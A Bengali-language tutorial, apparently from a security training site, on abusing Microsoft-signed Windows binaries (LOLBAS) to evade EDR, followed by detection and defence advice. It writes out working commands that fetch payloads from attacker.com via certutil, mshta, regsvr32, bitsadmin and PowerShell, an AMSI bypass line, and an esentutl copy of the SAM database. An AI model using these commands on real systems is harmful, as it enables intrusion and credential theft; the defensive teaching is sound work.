LOLBAS Exploitation: উইন্ডোজের নিজস্ব বাইনারি ব্যবহার করে ইডিআর সিস্টেম বাইপাস!
LOLBAS Exploitation হলো Windows-এর Signed Binary ব্যবহার করে EDR এবং Antivirus Evasion-এর Advanced Red Team কৌশল।
আধুনিক Endpoint Detection and Response (EDR) সিস্টেমগুলো অত্যন্ত উন্নত হয়েছে। Machine Learning, Behavioral Analytics, এবং Cloud-based Threat Intelligence-এর সমন্বয়ে এগুলো একটি Unknown Binary-কে কয়েক সেকেন্ডের মধ্যে শনাক্ত করতে পারে। কিন্তু একটি Microsoft-signed Binary-কে EDR সহজে Block করে না - কারণ এটি Operating System-এর অপরিহার্য অংশ। ঠিক এই ফাঁকটিকেই কাজে লাগায় LOLBAS Exploitation। LOLBAS, অর্থাৎ "Living Off The Land Binaries, Scripts and Libraries", হলো এমন একটি ক্যাটালগ যেখানে Microsoft-signed Binary-গুলোর Unintended Use Case ডকুমেন্ট করা থাকে - যেগুলো Red Team Operator-রা EDR Evasion-এর জন্য ব্যবহার করেন।
এই বিস্তৃত প্রবন্ধে আমরা LOLBAS Exploitation-এর গভীরে যাব - এর কৌশলগত গুরুত্ব, প্রচলিত Binary এবং তাদের Abuse Method, Advanced Evasion কৌশল, বাস্তব APT উদাহরণ, এবং সবশেষে কীভাবে Defenders এই ধরনের আক্রমণ শনাক্ত ও প্রতিরোধ করবেন।
LOLBAS Project এবং তার গুরুত্ব
LOLBAS Project (lolbas-project.github.io) একটি Community-driven উদ্যোগ যা Windows-এর Built-in Binary, Script, এবং Library গুলোর Adversarial Use ডকুমেন্ট করে। প্রতিটি Entry-তে থাকে - Binary-র Name, Microsoft-এর Original Purpose, Adversarial Use Case (Execute, Download, Copy, Encode, ইত্যাদি), এবং নির্দিষ্ট কমান্ড উদাহরণ।
প্রকল্পটি MITRE ATT&CK-এর T1218 (Signed Binary Proxy Execution) Technique-এর সাথে ঘনিষ্ঠভাবে সম্পর্কিত। প্রতিটি LOLBAS Binary-ই MITRE ATT&CK Sub-technique-এর সাথে ম্যাপ করা।
EDR Evasion-এ LOLBAS এত কার্যকর হওয়ার তিনটি প্রধান কারণ। প্রথমত, প্রতিটি LOLBAS Binary Microsoft-signed, তাই Code Signing-ভিত্তিক Detection Bypass করে। দ্বিতীয়ত, এগুলো সাধারণত Whitelisted - AppLocker এবং WDAC-এ অনুমতিপ্রাপ্ত। তৃতীয়ত, এগুলোর কার্যকলাপ Legitimate Administrative Activity-র সাথে মিলে যায়।
জনপ্রিয় LOLBAS Binary গুলো
certutil.exe
Microsoft-এর Certificate Management Utility, যা Certificate Authority Operation-এর জন্য তৈরি। কিন্তু এর Side Capability হলো File Download, Base64 Encoding/Decoding, এবং File Hash গণনা।
File Download:
certutil.exe -urlcache -split -f http://attacker.com/payload.exe %TEMP%\p.exe
Base64 Decode (Payload Obfuscation Bypass):
certutil.exe -decode encoded.b64 decoded.exe
আধুনিক EDR এই কৌশল সম্পর্কে ভালো জানে, তাই certutil-এর Network Activity আজকাল অধিকাংশ ক্ষেত্রে Flag হয়। তবু Less Mature পরিবেশে এটি কাজ করে।
mshta.exe
Microsoft HTML Application Host - এটি .hta ফাইল চালায় যেখানে HTML, VBScript, এবং JScript থাকতে পারে। Remote URL থেকে সরাসরি HTA চালানোর ক্ষমতা এটিকে আক্রমণকারীদের জন্য আকর্ষণীয় করে তোলে।
mshta.exe http://attacker.com/payload.hta
mshta.exe vbscript:CreateObject("Wscript.Shell").Run("cmd.exe /c calc")
regsvr32.exe (Squiblydoo)
মূলত DLL Registration-এর জন্য, কিন্তু /i ফ্ল্যাগ দিয়ে একটি Remote .sct (Scriptlet) ফাইল চালানো যায়। এই কৌশল "Squiblydoo" নামে পরিচিত, যা Casey Smith (subTee) প্রথম প্রকাশ করেন।
regsvr32.exe /s /n /u /i:http://attacker.com/payload.sct scrobj.dll
এর সবচেয়ে শক্তিশালী দিক হলো এটি Disk-এ কিছু লিখে না - সম্পূর্ণ In-memory Execution।
rundll32.exe
DLL থেকে Exported Function চালানোর Standard Tool। আক্রমণকারীরা এটি ব্যবহার করে JavaScript এক্সিকিউট, Malicious DLL Load, এবং বিভিন্ন Indirect Code Execution চালায়।
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("cmd.exe")
MSBuild.exe
Microsoft Build Engine, যা .csproj ফাইল থেকে C# Code Compile এবং Execute করতে পারে। Inline Task ব্যবহার করে এটি একটি Malicious Payload চালাতে পারে।
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="Hello">
<Hello />
</Target>
<UsingTask TaskName="Hello" TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
public class Hello : Microsoft.Build.Utilities.Task {
public override bool Execute() {
System.Diagnostics.Process.Start("calc.exe");
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
MSBuild.exe payload.csproj
MSBuild .NET Developer-দের সিস্টেমে প্রায় সবসময় থাকে, তাই এটি একটি জনপ্রiyo Evasion পথ।
InstallUtil.exe এবং RegAsm.exe
.NET Framework-এর Component যেগুলো Assembly Install/Register করে। কিন্তু /U flag দিয়ে এগুলো একটি Custom Assembly থেকে কোড চালাতে পারে। Casey Smith-এর গবেষণায় এই কৌশল প্রকাশ পায়।
InstallUtil.exe /logfile= /LogToConsole=false /U payload.dll
bitsadmin.exe এবং esentutl.exe
BITS (Background Intelligent Transfer Service) Microsoft Update-এর জন্য তৈরি, কিন্তু আক্রমণকারীরা এটি দিয়ে File Download এবং Persistence চালায়। esentutl.exe Database Utility, যা File Copy এবং Read-এ ব্যবহার করা যায়।
bitsadmin /transfer myJob /download /priority high http://attacker.com/p.exe %TEMP%\p.exe
esentutl.exe /y c:\windows\system32\config\sam /d %TEMP%\sam.copy
esentutl-এর শেষ কমান্ডটি SAM Database-এর Locked Copy বের করতে পারে, যা Credential Dumping-এ ব্যবহৃত হয়।
wmic.exe
Windows Management Instrumentation Command-line tool। যদিও Microsoft এটি Deprecate করছে, এটি এখনো অধিকাংশ সিস্টেমে available। Remote Execution, Process Enumeration, এবং Registry Manipulation-এ ব্যবহৃত হয়।
wmic.exe process call create "cmd.exe /c calc"
wmic.exe /node:target /user:admin process call create "payload.exe"
PowerShell এবং তার নিজস্ব Ecosystem
PowerShell নিজেই একটি LOLBAS - এর Capability এতটাই বিস্তৃত যে অসংখ্য Sub-technique রয়েছে। Empire, PowerSploit, Nishang Framework এই Ecosystem-এর উপর তৈরি।
In-memory Execution:
IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')
AMSI Bypass:
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
PowerShell-এর Constrained Language Mode এবং AMSI আক্রমণকারীদের জন্য কিছুটা বাধা, কিন্তু নতুন Bypass কৌশল প্রতিনিয়ত প্রকাশিত হচ্ছে।
Advanced LOLBAS Techniques
DLL Sideloading
DLL Sideloading-এ একটি Legitimate Microsoft-signed Application চালানো হয়, কিন্তু এর প্রয়োজনীয় DLL-এর জায়গায় Malicious DLL রাখা হয়। যেহেতু Windows Library Search Order অনুযায়ী Current Directory-তে থাকা DLL আগে Load হয়, এই Trick কাজ করে।
প্রসিদ্ধ উদাহরণ - OneDriveStandaloneUpdater.exe বা MsMpEng.exe (Defender)-এর সাথে DLL Sideloading। APT41 এবং অন্যান্য চীনা গোষ্ঠী এই কৌশল ব্যাপকভাবে ব্যবহার করে।
Process Injection via LOLBAS
কিছু LOLBAS Binary অন্য Process-এ Code Injection-এ ব্যবহার করা যায়। উদাহরণস্বরূপ, AddInProcess32.exe বা vbc.exe-এর মতো Binary Memory-তে Code Execute করতে পারে যা Detection Bypass-এ সহায়ক।
Indirect Execution via WMI
WMI দিয়ে অন্য Process-এর Context-এ Code চালানো যায়, যা EDR-এর Process Tree Tracking Confuse করে।
wmic /node:localhost /user:admin /password:pass process call create "cmd.exe /c calc"
WMI-Event Subscription আরো গোপন - একটি WMI Permanent Event Subscription তৈরি করে আক্রমণকারী Persistence অর্জন করতে পারে যা Reboot-এও টিকে।
Office Macro এবং LOLBAS Chain
Initial Access-এর একটি জনপ্রিয় পথ হলো Phishing Email-এ Malicious Office Document। Macro সরাসরি Payload না চালিয়ে একটি LOLBAS Chain Trigger করে - যেমন Macro mshta চালায়, mshta একটি PowerShell Script Download করে, এবং PowerShell Memory-তে Cobalt Strike Beacon Load করে।
এই Multi-stage Approach Detection আরো কঠিন করে কারণ প্রতিটি ধাপ আলাদাভাবে Innocuous দেখায়।
Cobalt Strike এবং LOLBAS Integration
Cobalt Strike, Red Team এবং প্রকৃত APT উভয় ক্ষেত্রেই সবচেয়ে জনপ্রিয় C2 Framework, LOLBAS-এর সাথে গভীরভাবে Integrated। এর Malleable C2 Profile এবং Aggressor Script ব্যবহার করে বিভিন্ন LOLBAS Technique স্বয়ংক্রিয়ভাবে চালানো যায়।
execute-assembly কমান্ড একটি .NET Assembly সরাসরি Beacon Memory-তে চালায়, যা Disk-এ কোনো File লিখে না। inline-execute BOF (Beacon Object File) চালায়।
বাস্তব APT গ্রুপের উদাহরণ
APT29 (Cozy Bear): SolarWinds Operation-এ extensively LOLBAS ব্যবহার করেছে - PowerShell, WMI, এবং certutil।
APT41 (Double Dragon): চীনা State-aligned গোষ্ঠী, DLL Sideloading এবং MSBuild Abuse-এর জন্য বিখ্যাত।
Volt Typhoon: CISA-র Advisory অনুযায়ী, এই গোষ্ঠী US Critical Infrastructure-এ আক্রমণে প্রায় সম্পূর্ণভাবে LOLBAS ভিত্তিক ছিল - netsh, ntdsutil, wmic, এবং PowerShell ব্যবহার করেছে।
FIN7: Financially motivated গোষ্ঠী, Restaurant এবং Retail সেক্টরে আক্রমণে certutil, mshta, এবং regsvr32 Squiblydoo ব্যাপকভাবে ব্যবহার করেছে।
EDR Evasion-এর Modern Approach
আধুনিক EDR Behavioral Detection-এ দক্ষ, তাই শুধু LOLBAS ব্যবহার করলেই Bypass হয় না। আক্রমণকারীরা এখন:
Process Argument Spoofing: PEB Manipulation-এর মাধ্যমে কমান্ড লাইন Argument গোপন করা। SwampThing-এর মতো টুল এই কাজ করে।
Direct System Call (Syscall): Win32 API Hooks Bypass করতে সরাসরি Syscall করা। SysWhispers এবং Hell's Gate-এর মতো প্রকল্প এই কৌশল প্রদান করে।
Module Stomping: একটি Legitimate Loaded DLL-এর Memory Section-এ Malicious Code Overwrite করা।
ETW Patching: Event Tracing for Windows (ETW) Patch করে EDR-এর Visibility কমানো।
Sleep Mask এবং Indirect Syscall: Cobalt Strike-এর Sleep Mask Beacon Memory-কে Encrypt করে যখন Idle থাকে, তাই Memory Scanning Detection Bypass হয়।
Detection এবং Defense Strategies
LOLBAS Exploitation শনাক্ত করা চ্যালেঞ্জিং কারণ এর কার্যকলাপ Legitimate Activity-এর সাথে মিলে যায়। তবু কিছু কার্যকর Detection কৌশল আছে।
Command Line Auditing: Windows Event ID 4688 (Process Creation) Command Line Argument সহ Logging সক্ষম করতে হবে। অস্বাভাবিক Command Line Pattern - যেমন certutil-এর -urlcache, regsvr32-এর /i:http, বা rundll32-এর javascript: - SIEM-এ Alert তৈরি করতে হবে।
Parent-Child Process Anomaly: MS Word থেকে certutil বা PowerShell চালু হওয়া স্বাভাবিক নয়। Sysmon Event ID 1 এবং MDE-এর Process Tree এই Detection সম্ভব করে।
Network Connection from LOLBAS: certutil বা mshta যদি Network Connection স্থাপন করে, এটি প্রায় সবসময় Suspicious। Sysmon Event ID 3 এই তথ্য দেয়।
File Write Patterns: LOLBAS Binary গুলো %TEMP%, %APPDATA%-তে File লেখা সন্দেহজনক।
AMSI এবং Script Block Logging: PowerShell-এ Script Block Logging (Event ID 4104) সক্ষম রাখা অপরিহার্য। Encoded Command Detect করার জন্য Regex Rule প্রয়োজন।
EDR Behavioral Rules: CrowdStrike, SentinelOne, Microsoft Defender for Endpoint - সবার নিজস্ব LOLBAS Detection আছে, কিন্তু Custom Rule যোগ করা প্রায়ই প্রয়োজন।
প্রতিরোধ ও প্রতিকার
LOLBAS Exploitation প্রতিরোধে Defense in Depth অপরিহার্য।
Application Control: Microsoft AppLocker বা Windows Defender Application Control (WDAC) ব্যবহার করে অপ্রয়োজনীয় LOLBAS Binary Block করা। উদাহরণস্বরূপ, একটি Standard Workstation-এ MSBuild, InstallUtil, বা bitsadmin-এর প্রয়োজন নাও থাকতে পারে।
PowerShell Constrained Language Mode: সাধারণ Workstation-এ Constrained Language Mode সক্ষম করলে অনেক PowerShell Attack কাজ করে না। Just Enough Administration (JEA) Privileged Account-এর জন্য বিবেচনা করতে হবে।
Attack Surface Reduction (ASR) Rules: Microsoft Defender-এর ASR Rules অনেক LOLBAS Technique স্বয়ংক্রিয়ভাবে Block করে - "Block Office applications from creating child processes", "Block execution of potentially obfuscated scripts" ইত্যাদি।
EDR Deployment এবং Tuning: একটি ভালো EDR সলিউশন অপরিহার্য, কিন্তু সেটি সঠিকভাবে Tune করা আরো গুরুত্বপূর্ণ। Custom Detection Rule নিয়মিত যোগ করতে হবে।
Privilege Reduction: সাধারণ ব্যবহারকারীদের Local Admin না দেওয়া। PAM (Privileged Access Management) সমাধান যেমন CyberArk, BeyondTrust ব্যবহার করতে হবে।
Network Segmentation: যাতে Initial Compromise Lateral Movement-এ না পরিণত হয়, তার জন্য Network Zone সঠিকভাবে সেট করতে হবে।
Continuous Red Teaming: নিজের পরিবেশে LOLBAS Technique পরীক্ষা করে Blind Spot খুঁজে বের করতে হবে। Atomic Red Team এবং Caldera-র মতো Automated Adversary Simulation টুল কাজে লাগে।
LOLBAS Exploitation আধুনিক Red Team Tradecraft-এর কেন্দ্রবিন্দু। Microsoft-signed Binary-গুলো EDR এবং Antivirus-এর জন্য একটি Blind Spot তৈরি করে, এবং পরিশীলিত আক্রমণকারীরা এই Gap-কে ব্যবহার করে Stealthy Operation চালায়। certutil, mshta, regsvr32, rundll32, MSBuild থেকে শুরু করে PowerShell এবং WMI - প্রতিটি LOLBAS Binary-র নিজস্ব Use Case এবং Detection Challenge রয়েছে। Defenders-দের জন্য Command Line Auditing, Parent-Child Process Analysis, Network Activity Correlation, এবং Application Control-এর সমন্বিত কৌশল প্রয়োজন। MITRE ATT&CK Framework, LOLBAS Project, এবং Sigma Repository হলো এই Battle-এর জন্য অপরিহার্য Resource। মনে রাখতে হবে, একটি পরিবেশের সবচেয়ে দুর্বল লিঙ্ক প্রায়শই অভিনব Malware নয়, বরং Operating System-এর নিজের Built-in টুলের অপব্যবহার।
আপনার জ্ঞান যাচাই করতে প্রস্তুত? আজই HackCert-এ LOLBAS Exploitation MCQ Quiz-টি দিন!